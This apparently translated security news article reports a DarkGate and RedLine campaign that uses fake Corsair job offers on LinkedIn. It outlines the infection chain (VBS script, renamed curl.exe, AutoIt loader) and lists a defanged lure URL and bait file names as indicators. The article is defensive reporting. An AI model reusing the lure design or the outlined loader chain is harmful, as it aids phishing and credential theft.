Corsair’s fake LinkedIn job postings push DarkGate malware

Corsair’s fake LinkedIn job postings push DarkGate malware

The attacker uses fake LinkedIn posts and direct messages about a Facebook advertising specialist position at hardware maker Corsair to trick people into downloading information-stealing malware like DarkGate and RedLine. This is reported by Bleeping Computer.

The cyber security company WithSecure discovered the activity and tracked the group’s activities. The report indicated that it was linked to the Vietnamese cybercrime groups responsible for the Ducktail campaigns first noticed last year.

These campaigns aim to steal valuable business Facebook accounts that can be used for malicious advertising or sold to other cybercriminals.

Recent examples of DarkGate use include phishing attacks via Microsoft Teams that move payloads and use compromised Skype accounts to send VBS scripts to start the infection chain leading to malware.

The Vietnamese attackers mainly targeted users in the US, UK and India, who hold senior positions in social networks and are likely to have access to Facebook business accounts. The bait is delivered via LinkedIn and contains a job offer at Corsair.

Targets are tricked into downloading malicious files from a URL (g2[.]by/corsair-JD) which redirects to Google Drive or Dropbox to drop a ZIP file (Salary and new with a PDF file or a DOCX document and a TXT file with the following names:

  • Corsair job description.docx.
  • Salary and new products.txt.
  • PDF Salary and products.pdf.

WithSecure researchers analyzed the metadata for the above files and found the sources of RedLine stealer distribution.

The downloaded archive contains a VBS script, possibly embedded in a DOCX file, that copies and renames “curl.exe” to a new location and uses it to load “autoit3.exe” and the compiled Autoit3 script.

The executable runs the script, and the latter confuses itself and creates a DarkGate using the lines present in the script.

30 seconds after installation, the malware attempts to remove security products from the compromised system, suggesting the existence of an automated process.

Late last year, LinkedIn introduced anti-abuse features on the platform that can help users identify whether an account is suspicious or fake. However, users should verify the information received before communicating with a new account.

WithSecure has published a list of Indicators of Compromise (IoC) that can help organizations protect against the actions of this malicious actor. Details include IP addresses, domains used, URLs, file metadata, and archive names.

Read also on our website: Ukrainian hackers of the Ukrainian Cyber ​​​​Alliance hacked the servers of Russian cybercriminals.

Subscribe to ProIT in Telegramso you don’t miss a post!

Related posts